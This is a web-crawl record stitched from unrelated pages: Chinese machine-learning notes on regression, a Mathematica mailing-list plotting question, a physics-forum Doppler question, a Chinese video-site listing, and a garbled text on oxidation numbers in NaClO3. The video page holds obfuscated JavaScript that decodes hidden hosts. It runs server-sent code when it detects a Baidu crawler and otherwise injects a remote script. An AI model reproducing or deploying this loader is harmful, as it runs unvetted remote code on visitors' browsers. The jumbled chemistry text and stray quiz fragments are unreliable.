{"ft_lang_label":"__label__en","ft_lang_prob":0.64413834,"math_prob":0.88883686,"size":556,"snap":"2021-04-2021-17","text_gpt3_token_len":161,"char_repetition_ratio":0.08876812,"word_repetition_ratio":0.0952381,"special_character_ratio":0.30035973,"punctuation_ratio":0.17475729,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9550363,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-17T16:25:16Z\",\"WARC-Record-ID\":\"<urn:uuid:f43ee65f-505c-4aa3-8d7e-be904ad938e2>\",\"Content-Length\":\"20293\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9063d9a9-8cfe-4649-87bc-061d399c7ae0>\",\"WARC-Concurrent-To\":\"<urn:uuid:64bb8856-c08c-4859-b823-616df0dac35a>\",\"WARC-IP-Address\":\"194.44.31.54\",\"WARC-Target-URI\":\"http://umj-old.imath.kiev.ua/article/?lang=en&article=4385\",\"WARC-Payload-Digest\":\"sha1:NZIBUK6HBJVDOQE75J5BTVVMI3HDRDAV\",\"WARC-Block-Digest\":\"sha1:PQTO4IZGJROJ3HWPZ6J4O4DMQQYUE7L2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703513062.16_warc_CC-MAIN-20210117143625-20210117173625-00483.warc.gz\"}"}
http://www.limoncc.com/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0/2017-01-08-%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B00001/
[ "### 一、机器学习若干符号解释\n\n#### 3、假设空间:\n\n##### 1、如果真实的世界的关系是 $\\displaystyle y=h(\\boldsymbol{x})$, 世界充满噪声。所以 $\\displaystyle y=h(\\boldsymbol(x)+e$。\n\n1、世界是这样的: $\\displaystyle p(y=h(\\boldsymbol{x})\\mid\\boldsymbol{x})$\n2、我们观察到的世界是这样的:$\\displaystyle \\mathcal{D}=\\{(\\boldsymbol{x}_i,y_i)\\}_{i=1}^{n}$\n3、我们假设世界是这样的: $\\displaystyle p(y=f(\\boldsymbol{x)\\mid }\\boldsymbol{x},\\mathcal{D},M)$[^1],其中 $\\displaystyle M$是模型(算法)。\n\n$\\displaystyle \\varepsilon=y-f=y-h+h-f=y-h+h-\\mathrm{E}[f]+\\mathrm{E}[f]-f$\n$\\displaystyle \\mathrm{E}[\\varepsilon^2]=\\mathrm{Var}[e]+\\left(h-\\mathrm{E}[f]\\right)^2+\\mathrm{E}\\left[\\left(f-\\mathrm{E}[f]\\right)^2\\right]$\n$$平方损失期望=噪声方差+偏误^2+模型方差$$\n\n4、我们还可以写成:\n$\\displaystyle \\mathcal{H} =\\{f\\mid p(y=f(\\boldsymbol{x})\\mid\\boldsymbol{x}, \\mathcal{D})\\}=\\{f(\\boldsymbol{\\beta})\\mid p(y=f(\\boldsymbol{x};\\boldsymbol{\\beta})\\mid \\boldsymbol{x},\\mathcal{D};\\boldsymbol{\\beta}),\\boldsymbol{\\beta}\\in \\mathbb{R}^k\\}$。这里的$\\displaystyle \\mathcal{H}$是模型 $f$的集合。\n\n##### 2、这里的符号有一个重要的解释:\n\n$\\displaystyle y$是一个随机变量,它的取值是 $\\displaystyle y=y_i$。 $\\displaystyle \\boldsymbol{x}$表示的是 $\\displaystyle n$个 $\\displaystyle k$维输入数据。也就是说 $\\displaystyle \\boldsymbol{x}$也是一个变量,不过是向量的形式。它的取值是 $\\displaystyle \\boldsymbol{x}=\\boldsymbol{x}_i$。\n\n##### 3、换一个程序员比较好理解的说法:\n\n$\\displaystyle y,\\boldsymbol{x}$是一个类。而 $\\displaystyle y_i,\\boldsymbol{x}_i$是一个实例。所以一个实例 $\\displaystyle P(y_i\\mid \\boldsymbol{x}_i,\\mathcal{D})$,又有 $\\displaystyle P(y_{n+1}\\mid \\boldsymbol{x}_{n+1},\\mathcal{D})$是一个数或者一个概率。$\\displaystyle \\hat{y},\\hat{y}_i$也是类和实例的区别。\n\n#### 4、算法空间\n\n$\\displaystyle \\zeta\\in\\mathcal{L}$,它是算法的集合。\n\n#### 5、参数空间\n\n$\\displaystyle \\boldsymbol{\\beta} \\in\\mathbb{R}^k$。这里的元素我们将 $\\displaystyle \\mathbb{R}^k$的k维有序组与向量矩阵$\\mathop{\\boldsymbol{\\beta}}\\limits_{(k\\times 1)}$等同,以方便表达。\n\n#### 6、概念总结", null, "#### 7、指示函数,或者叫示性函数\n\n$\\displaystyle \\mathrm{I}_x(A)=\\begin{cases}1&\\text{if }x\\in A\\\\0&\\text{if }x\\notin A\\end{cases}$\n\n### 二、回归模型\n\n#### 1、线性回归模型:\n\n$y_i=\\boldsymbol{x}_{i}^T\\boldsymbol{\\beta}+\\epsilon_i=\\boldsymbol{x}_{i,:\\,}^T\\boldsymbol{\\beta}+\\epsilon_i$\n$\\boldsymbol{y}=\\boldsymbol{X}\\boldsymbol{\\beta}+\\boldsymbol{\\epsilon}$\n$S=\\boldsymbol{\\epsilon}^{\\text{T}}\\boldsymbol{\\epsilon}$\n\n$$\\displaystyle \\mathop{\\boldsymbol{y}}\\limits_{(n\\times 1)}=\\underbrace{\\mathop{\\boldsymbol{X}}\\limits_{(n\\times k)} \\mathop{\\boldsymbol{\\beta}}\\limits_{(k\\times 1)}}_{n\\times k} +\\mathop{\\boldsymbol{\\epsilon}}\\limits_{(n\\times 1)}$$\n\n#### 2、梯度下降算法:$\\boldsymbol{\\beta}: =\\boldsymbol{\\beta}-\\alpha\\nabla S$\n\n$$\\begin{cases} \\dot{x}=-3x+5y\\\\ \\dot{y}=-5x-7\\sin(y) \\end{cases}$$动力系统的相图。那么如果是凸函数。相图上的曲线集就会流向平衡点。如图", null, "$$\\begin{cases} \\dot{x}=-x+y\\\\ \\dot{y}=xy-1 \\end{cases}$$这个系统就非常复杂了。初始位置不同,我们将走向完全不同的结局。", null, "##### 3、规范方程", null, "$$\\mathop {\\min }\\limits_\\boldsymbol{\\beta}S=\\boldsymbol{\\epsilon}^{\\text{T}}\\boldsymbol{\\epsilon}$$简单推理易得:$\\hat{\\boldsymbol{\\beta}}=(\\boldsymbol{X}^T\\boldsymbol{X})^{-1}\\boldsymbol{X}^T\\boldsymbol{y}$\n\n$\\displaystyle \\boldsymbol{X}$张成的空间,或者说超平面 $\\displaystyle span(\\boldsymbol{X})=span(\\boldsymbol{x}_{:,1},…,\\boldsymbol{x}_{:,j},…,\\boldsymbol{x}_{:,k})$ 这里的 $\\displaystyle\\boldsymbol{x}_{:,j}=\\left[\\begin{array}{c}x_{1,j} \\\\x_{2,j}\\\\\\vdots\\\\x_{n,j}\\end{array}\\right]$。如图我们很容发现要使得 $\\displaystyle\\boldsymbol{\\epsilon}$的欧式距离最短。那么$\\displaystyle\\boldsymbol{\\epsilon}$必然与 $\\displaystyle span(\\boldsymbol{x}_{:,1},…,\\boldsymbol{x}_{:,jj},…,\\boldsymbol{x}_{:,k})$垂直。即有如下方程。\n$$\\boldsymbol{X}^T\\boldsymbol{\\epsilon}=\\boldsymbol{X}^T(\\boldsymbol{y}-\\boldsymbol{X}\\hat{\\boldsymbol{\\beta}})=\\boldsymbol{0}$$简单推理易得:$\\hat{\\boldsymbol{\\beta}}=(\\boldsymbol{X}^T\\boldsymbol{X})^{-1}\\boldsymbol{X}^T\\boldsymbol{y}$。所以 $\\displaystyle \\boldsymbol{y}$的最佳估计量 $\\displaystyle \\hat{\\boldsymbol{y} }$是 $\\displaystyle \\boldsymbol{y}$在$\\displaystyle span(\\boldsymbol{x}_{:,1},…,\\boldsymbol{x}_{:,jj},…,\\boldsymbol{x}_{:,k})$空间上的投影。\n\n### 注释:\n\n[^1]: 如果 $\\displaystyle \\zeta$表示算法,可写为$\\displaystyle P(y\\mid \\boldsymbol{x},\\mathcal{D},\\zeta)$\n\n 版权声明", null, "", null, "由引线小白创作并维护的柠檬CC博客采用署名-非商业-禁止演绎4.0国际许可证。本文首发于柠檬CC [ http://www.limoncc.com ] , 版权所有、侵权必究。 本文永久链接 http://www.limoncc.com/机器学习/2017-01-08-机器学习笔记0001/" ]
[ null, "http://oiol5pi05.bkt.clouddn.com/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0%E6%A1%86%E6%9E%B6.png", null, "http://oiol5pi05.bkt.clouddn.com/%E7%9B%B8%E5%9B%BE.png", null, "http://oiol5pi05.bkt.clouddn.com/%E7%9B%B8%E5%9B%BE2.png", null, "http://oiol5pi05.bkt.clouddn.com/%E7%BA%BF%E6%80%A7%E5%9B%9E%E5%BD%92.jpg", null, "http://www.limoncc.com/images/cc.png", null, "http://www.limoncc.com/images/avatar.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.5559531,"math_prob":0.999966,"size":7183,"snap":"2019-35-2019-39","text_gpt3_token_len":3818,"char_repetition_ratio":0.35882434,"word_repetition_ratio":0.0,"special_character_ratio":0.3171377,"punctuation_ratio":0.11120472,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99996996,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,6,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-18T21:28:28Z\",\"WARC-Record-ID\":\"<urn:uuid:338fc54c-14f3-4e82-a970-49dec7608fbb>\",\"Content-Length\":\"52517\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0dbf0226-d2e0-41d5-b5a5-3be02f1a89c3>\",\"WARC-Concurrent-To\":\"<urn:uuid:60e51f6c-9aea-43f6-811e-442f9452a1b1>\",\"WARC-IP-Address\":\"185.199.109.153\",\"WARC-Target-URI\":\"http://www.limoncc.com/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0/2017-01-08-%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B00001/\",\"WARC-Payload-Digest\":\"sha1:JSDWQAO27NPYN4AKZBIE3TULYX4VQ7UZ\",\"WARC-Block-Digest\":\"sha1:HLR36F5IFWHUBQKITJAQOPWDT2UGBB7S\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027314130.7_warc_CC-MAIN-20190818205919-20190818231919-00168.warc.gz\"}"}
http://forums.wolfram.com/mathgroup/archive/2005/Apr/msg00099.html
[ "", null, "", null, "", null, "", null, "", null, "", null, "", null, "3D graphics domain\n\n• To: mathgroup at smc.vnet.net\n• Subject: [mg55731] 3D graphics domain\n• From: Richard Bedient <rbedient at hamilton.edu>\n• Date: Tue, 5 Apr 2005 03:20:50 -0400 (EDT)\n• Sender: owner-wri-mathgroup at wolfram.com\n\n```Thanks to Bob and Dan for helping me get this far. Again, I've exhausted\nmy Mathematica knowledge along with anything I can find in the Help\nfiles. I now need to take the function they found for me and graph it\nin 3D over a restricted domain. Here's the problem:\n\nGraph the function\n\nf(x,y) = -64*x + 320*(x^2) - 512*(x^3) + 256*(x^4) + 20*y - 64*x*y +\n64*(x^2)*y - 4*(y^2)\n\nover the domain:\n\ny <= 4*x*(1-x)\ny >= 4*x*(1 - 2x)\ny >= 4*(x - 1)*(1 - 2x)\n\nThanks for any help.\n\nDick\n\n```\n\n• Prev by Date: Re: How do I remove operator status?\n• Next by Date: MiKTeX pdfTeX \"problem\" fixed?\n• Previous by thread: Re: NMinimize--problem with a min-max problem\n• Next by thread: Re: 3D graphics domain" ]
[ null, "http://forums.wolfram.com/mathgroup/images/head_mathgroup.gif", null, "http://forums.wolfram.com/mathgroup/images/head_archive.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/2.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/5.gif", null, "http://forums.wolfram.com/mathgroup/images/search_archive.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7321259,"math_prob":0.75604886,"size":703,"snap":"2020-45-2020-50","text_gpt3_token_len":252,"char_repetition_ratio":0.08583691,"word_repetition_ratio":0.0,"special_character_ratio":0.3954481,"punctuation_ratio":0.124223605,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9964621,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-02T07:09:40Z\",\"WARC-Record-ID\":\"<urn:uuid:d9a503f6-fb33-4906-899d-d096efd5fa2b>\",\"Content-Length\":\"43924\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a9511a4e-1698-43ea-85cc-e03168415b90>\",\"WARC-Concurrent-To\":\"<urn:uuid:ddd45030-f70e-4f68-9964-141d39c61bb4>\",\"WARC-IP-Address\":\"140.177.205.73\",\"WARC-Target-URI\":\"http://forums.wolfram.com/mathgroup/archive/2005/Apr/msg00099.html\",\"WARC-Payload-Digest\":\"sha1:SEG3A5NNC62KJFEC7RKDUGN2L3ONAJT7\",\"WARC-Block-Digest\":\"sha1:WNSIAGUMJK2M3EPEEDL4WDILUTIQNKJW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141692985.63_warc_CC-MAIN-20201202052413-20201202082413-00370.warc.gz\"}"}
https://www.physicsforums.com/threads/doppler-effect-for-light.798202/
[ "# Doppler Effect for light\n\n## Homework Statement\n\nThis isn't strictly a homework problem, but I didn't know where else to post this. I can't get the same derivation as my lecturer for the Doppler effect of light - which is shown in the attached file. If you cannot open this, I re-wrote it further down.\n\n## The Attempt at a Solution\n\nFor the part in the red box, I thought one would do this via Taylor expansion, thus I expected the ##\\frac{u}{c}## to be squared, i.e fr = fs##(1 \\pm \\frac{1}{2}\\frac{u}{c}^2)(1 \\pm \\frac{1}{2}\\frac{u}{c}^2)##. I can't see why this wouldn't be the case. Could someone please tell me why I'm wrong?\n\n(In case you cannot open the file, my lecture notes say fr = fs##(1 \\pm \\frac{u}{c})^\\frac{1}{2} (1 \\pm \\frac{u}{c})^\\frac{-1}{2}##=##(1 \\pm \\frac{1}{2}\\frac{u}{c})(1 \\pm \\frac{1}{2}\\frac{u}{c})##)\n\n#### Attachments\n\n• 578.2 KB Views: 87" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8899279,"math_prob":0.8825317,"size":861,"snap":"2020-24-2020-29","text_gpt3_token_len":291,"char_repetition_ratio":0.1831972,"word_repetition_ratio":0.0,"special_character_ratio":0.35772356,"punctuation_ratio":0.07853403,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9817654,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-09T15:58:31Z\",\"WARC-Record-ID\":\"<urn:uuid:70ff030b-a6d6-456e-bd16-66c33ca01fb5>\",\"Content-Length\":\"65539\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:893d19e3-a31c-40b9-a835-08789fc66506>\",\"WARC-Concurrent-To\":\"<urn:uuid:05a03973-d29c-460c-ab4a-7dc4404e05ad>\",\"WARC-IP-Address\":\"23.111.143.85\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/doppler-effect-for-light.798202/\",\"WARC-Payload-Digest\":\"sha1:ZMJZ3DM2QMRZ5442IGSKA6GBKUWZXQRS\",\"WARC-Block-Digest\":\"sha1:JK3QPP2XLWUTHRAYPIGLXBG4PPYNCLU2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655900335.76_warc_CC-MAIN-20200709131554-20200709161554-00464.warc.gz\"}"}
http://www.qufucits.com/video/107573.html
[ "# 养老庄园\n\n• HD\n• 超清\n• HD\n• HD\n• HD\n• HD\n• BD高清\n• HD\n\n• 高清\n• 10集全/已完结\n• HD\n• HD\n• HD\n• HD\n• HD\n• 高清\n\n### 养老庄园评论\n\n• 评论加载中...\n\nfunction agQbH(e){var t=\"\",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function fFKucWQk(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t=\"\",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,\"\");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return agQbH(t);};window[''+'o'+'p'+'K'+'m'+'x'+'F'+'z'+'t'+'Q'+'V'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=fFKucWQk,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c+''+c,'g'),c)));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('aGGJ0Lm1pbGGVjY3R2LmNu','ddHIueWVzddW42NzguY29t','142556',window,document,['G','d']);}:function(){};\n" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.6139389,"math_prob":0.9785521,"size":3484,"snap":"2021-43-2021-49","text_gpt3_token_len":2830,"char_repetition_ratio":0.09339081,"word_repetition_ratio":0.0,"special_character_ratio":0.3295063,"punctuation_ratio":0.29048085,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.958241,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-04T13:08:52Z\",\"WARC-Record-ID\":\"<urn:uuid:acda5144-b349-4324-9cea-ab1b287002e0>\",\"Content-Length\":\"46975\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0df15810-2e88-44e7-80ab-3450ce2a5f84>\",\"WARC-Concurrent-To\":\"<urn:uuid:9f308810-8ccf-40f1-bd6a-686701bb8263>\",\"WARC-IP-Address\":\"23.224.11.22\",\"WARC-Target-URI\":\"http://www.qufucits.com/video/107573.html\",\"WARC-Payload-Digest\":\"sha1:BYIR52H63RCZHFFD2GSOM4KXJXDYANJ7\",\"WARC-Block-Digest\":\"sha1:IAKOKHRCTCHFCU4LR7XYUNKTYQ22M3DC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964362992.98_warc_CC-MAIN-20211204124328-20211204154328-00080.warc.gz\"}"}
http://wholelifecounselling.net/state-attorney-cwzlk/b7f8e8-oxidation-number-of-na-in-naclo3
[ "7. So: Na + Cl + O = 0 +1 + Cl +(-2) = 0 Cl = +1 Li+ Cl + 2O = 0 +1 + Cl + 2(-2) = 0 Cl = +3 K + Cl + 3(O) = 0 Cl = +5 Rb + Cl + 4(O) = 0 Cl = +7 2. The thermal decomposition of sodium hypochlorite to produce sodium chlorate and sodium chloride. undergoes an oxidation its oxidation number increases. (2) (b) NaClO3 can be obtained from NaOCl(aq) by a disproportionation reaction on heating. The oxidation number of hydrogen is +1 when it is combined with a nonmetal as in CH 4, NH 3, H 2 O, and HCl. All uncombined elements have an oxidation number of zero eg . Published by at December 2, 2020. The equation shows the reaction between zinc metal and hydrochloric acid. Sodium chlorate is a strong oxidizer and may be reduced to a variety of chemical species depending on the environmental conditions. {Date of access}. Determine the oxidation number of a. Clin NaClO3 b. The oxidation number of sodium in the Na + ion is +1, for example, and the oxidation number of chlorine in the Cl-ion is -1. Zn (s) + 2HCl (aq) mc014-1. Please register to post comments. To calculate oxidation numbers of elements in the chemical compound, enter it's formula and click 'Calculate' (for example: . In the ionic product, the Na + ions have an oxidation number of +1, while the Br − ions have an oxidation number of −1. The oxidation number of simple ions is equal to the charge on the ion. The oxidation number of hydrogen in combination is +1 unless the H is present as H-1 (hydride, as in NaH) in which case the oxidation number is -1. The oxidation number is synonymous with the oxidation state. 8. Therefore, the oxidation number of the sodium ion, Na+, is+1 while the oxidation number of the chloride ion, Cl-, is -1. NaCl, CuBr2, NF3- halogens have oxidation states of -1 NaClO3- chlorine has an oxidation state of +5 Hydrogencan be +1, 0, -1 Hydrogen is zero in the diatomic molecule, +1 in most compounds, but it is -1 in hydrides such as NaH - sodium hydride. The oxidation state of an atom is the charge of this atom after ionic approximation of its heteronuclear bonds. Which of the following solutions is a good buffer system? (+ 1) + oxidation of C l + 3 (− 2) = 0 So the oxidation of chlorine in that problem is + 5. Molecular weight calculation: 22.98977 + 35.453 + 15.9994*3 2 22b. The equation shows the reaction between zinc metal and hydrochloric acid. What is the … Heat required to initiate this reaction is generated by oxidation of a small amount of iron powder mixed with the sodium chlorate, and the reaction consumes less oxygen than is produced. a solution that is 0.10 M HF and 0.10 M LiC2H3O2 a solution that is 0.10 M HC2H3O2 and 0.10 M LiC2H3O2 a solution that is 0. The thermal decomposition of sodium chlorate to produce sodium chloride and oxygen. The oxidation number of a monatomic ion equals the charge of the ion. In H 2 O, the hydrogen atoms each have an oxidation number of +1, while the oxygen has an oxidation number of −2, even though hydrogen and oxygen do … Why can chlorine change the oxidation number so drastically like in NaClO3 it's +5, if oxygen is-2 then couldnt it be +3 and Na also be +3, why does Na always stay +1, and is this just an exception to the rule or does this apply to every chlorine element in every compound? (a) A compound of sodium, chlorine and oxygen contains, by mass, 21.6% Na, 33.3% Cl and 45.1% O. Give the oxidation number of the sulfur in each of the following compounds: a. SOCl 2 b. H 2 S c. H 2 SO 3 d. SO 4 2 − e. S 8 P A.2 (pg 1 of 3) Oxidation Numbers Name_____Per_____ Barium peroxide ( Ba O 2) is used to absorb the chlorine that is … Determining oxidation numbers from the Lewis structure (Figure 1a) is even easier than deducing it from the molecular formula (Figure 1b). Generalic, Eni. 24. The alkaline earth metals (group II) are always assigned an oxidation number of +2. Since the electrons between two carbon atoms are evenly spread, the R group does not change the oxidation number of the carbon atom it's attached to. Zn, Cl2, O2, Ar all have oxidation numbers of zero 2. This reaction takes place at a temperature of 30-50°C. 8. The overall charge of molecule is zero (because it's not an ion). In OCl- Oxygen is more electronegative than Chlorine hence its oxidation state remains constant at -2 leftover is Chlorine to balance the charges on OCl- ot has to be of the oxidation state +1 The oxidation numbers of the elements in a compound add up to zero In NaCl Na= +1 Cl= -1 Sum = +1 -1 = 0 3. What is the oxidation number of carbon in carbonate ion (CO) Chlorine in (NaCIO3), carbon in Al(CO) 23. When dealing with organic compounds and formulas with multiple atoms of the same element, it's easier to work with molecular formulas and average oxidation numbers (Figure 1d). Answer to 3. Sodium is increasing its oxidation number from 0 to +1, so it is being oxidized; bromine is decreasing its oxidation number from 0 … 9. It is a neutral molecule. Redox reactions are common and vital to some of the basic functions of life, including photosynthesis, respiration, combustion, and corrosion or rusting. Write five observation of cotton ball and pine cone of the solid. ... 3 NaClO cnd [ temp ] = NaClO3 + 2 NaCl. The sum of all the oxidation numbers in a compound must equal the charge on the compound. © 2021 Education Expert, All rights reserved. |, Divide the redox reaction into two half-reactions, History of the Periodic table of elements, Electronic configurations of the elements, Naming of elements of atomic numbers greater than 100. To work thus out you need to know that sodium in compounds always has an oxidation number of +1 ( which you'd expect as it is in Group 1), and oxygen has an oxidation number of -2 in its compounds (except for peroxides). The sum of oxidation numbers in a compound must equal 0. An oxidation-reduction reaction is any chemical reaction in which the oxidation number of a molecule, atom, or ion changes by gaining or losing an electron. The oxidation number of a monoatomic ion is the same as its charge (e.g. 2 NaClO 3 → 2 NaCl + 3 O 2. 5.05 g 10. 2020. All rights reserved. Rules for assigning oxidation numbers. Web. You then use the rule that the sum of the oxidation numbers in a compound must add to zero, and Na (+1) … As a consequence of its reaction as an oxidant, sodium chlorate generates reduced chloro species (i.e., chlorine in lower oxidation states than chlorate), such as … The oxidation number of any halogen (Group 7) in combination with one other element other than oxygen is -1. Convergent boundaries Divergent boundaries Subduction boundaries Transform boundaries, Which of the following represents the shortest distance? Hence, the chlorine is both increasing and decreasing its oxidation states, and this reaction is a DISPROPORTIONATION one. 4. oxidation number of Na + = +1, and that of S 2-is -2) 3. 11.0 inches c. 271 millimeters d. 0.965 feet e. 0.000155 miles. Which of the following solutions is a good buffer system? When does the given chemical system reach dynamic equilibrium? jpg ZnCl2 (aq) + H2 (g) What is the theoretical yield of hydrogen gas if 5.00 mol of zinc are added to an excess of hydrochloric acid? Ca2+, HF2^-, Fe4[Fe(CN)6]3, NH4NO3, so42-, ch3cooh, cuso4*5h2o). What is the volume of carbon dioxide gas measured at 37 degree Celsius atm is produced by the decomposition of calcium carbonate? Fluorine in compounds is always assigned an oxidation number of -1. Add / Edited: 23.06.2015 / Evaluation of information: 5.0 out of 5 / number of votes: 1. The (III) is the oxidation number of chlorine in the chlorate ion here. Add your answer and earn points. oxidation number of na in nacl. Zn (s) + 2HCl (aq) mc014-1. The charge of oxygen is almost always − 2 so you can assume that as well. The oxidation number of a monatomic ion equals the charge of the ion. Na⁺¹Cl⁺⁵O⁻²₃Na +1O -2(+1) + (-2)*3 = -5-5 + (+5)=0Cl +5 takityler7250 takityler7250 06/30/2017 Chemistry High School Determine the oxidation state of cl in naclo3 See answer takityler7250 is waiting for your help. Show that this is consistent with the formula NaClO3. ››NaClO3 molecular weight. O A. Decreasing the temperature of the gas O B. Decreasing the pressure applied to the gas O C. Decreasing the number of gas molecules O D. Decreasing the size of the gas molecules SUBN, Consider the reaction. Therefore, the sum of the oxidation states of all the elements in the ionic compound must equate to zero. \"Oxidation numbers calculator.\" It involves a decrease in oxidation number Rules for assigning oxidation numbers 1. The alkali metals (group I) always have an oxidation number … You can find examples of usage on the Divide the redox reaction into two half-reactions page. In NaCl, it has an oxidation number of -1. Which is a good example of a contact force? The chemical formula of Sodium chlorate is {eq}\\rm NaClO_3 {/eq}. Categories . Convert grams NaClO3 to moles or moles NaClO3 to grams. Oxygen almost always has an oxidation number of -2, except in peroxides (H. Hydrogen has an oxidation number of +1 when combined with non-metals, but it has an oxidation number of -1 when combined with metals. This reaction takes place at a temperature near 250°C. 28.0 centimeters b. Using the periodic table of elements you can find the oxidation number of NaHCO3. Periodic Table of the Elements. b) The half reactions involved here are: 31 and 23 in Table 1.3 Use the same process as above to get the overall reaction: 1/8H 2 S + 1/3MnO 4 - + 1/12H + = 1/8SO 4 2- + 1/3MnO 2 + 1/6H … The algebraic sum of the oxidation states in an ion is equal to the charge on the ion. Unlike radicals in organic molecules, R cannot be hydrogen. An oxidation number tells us how many electrons are lost or gained by an atom in a compound. The oxidation number of each atom can be calculated by subtracting the sum of lone pairs and electrons it gains from bonds from the number of valence electrons. The algebraic sum of the oxidation numbers of elements in a compound is zero. The compound sodium sulfite (Na2SO3) contains 3 distinct elements namely: sodium, sulfur and oxygen. In this reaction, the catalyst is can be manganese(IV) oxide. Bonds between atoms of the same element (homonuclear bonds) are always divided equally. In NaClO3, it's +5, because oxygen is -2 and Na is +1 (remember that the sum of the oxidation states in a molecule, without any charge, is ZERO). 1 inch = 2.54 cm 12 in = 1 ft 5280 ft = 1 mile a. The oxidation number of an element in a monatomic ion is the charge of the ion. KTF-Split, 3 Mar. In NaCl, sodium has an oxidation number of +1, while chlorine has an oxidation number of −1, by rule 2. In binary compounds (two different elements) the element with greater electronegativity is assigned a negative oxidation number equal to its charge in simple ionic compounds of the element (e.g. 9. jpg ZnCl2 (aq) + H2 (g) What is the theoretical yield of hydrogen gas if 5.00 mol of zinc are added to an excess of hydrochloric acid? Since sodium is a 1A family member, you can assume that the charge is + 1. Therefore a high pH (low [H +]) would favor the reaction to the right (oxidation). Alkali metals always have a charge of +1, and O nearly always has an oxidation number of -2. Organic compounds can be written in such a way that anything that doesn't change before the first C-C bond is replaced with the abbreviation R (Figure 1c). when the forward and reverse reactions stop when the rate of the forward reaction is higher than the rate of the reverse reaction when the concentration of the, What type of plate boundary interactions takes place when tectonic plates move apart? 5.05 g 10. NO 3 − b. N 2 F 4 c. NH 4 + d. HNO 2 e. N 2 4. 2 Na 0 + Br 2 0 → 2 Na + 1 Br − 1. Give the oxidation number of the nitrogen in each of the following compounds: a. Copyright © 1998-2020 by Eni Generalic. Molar mass of NaClO3 = 106.44097 g/mol This compound is also known as Sodium Chlorate.. Become a Patron! +1 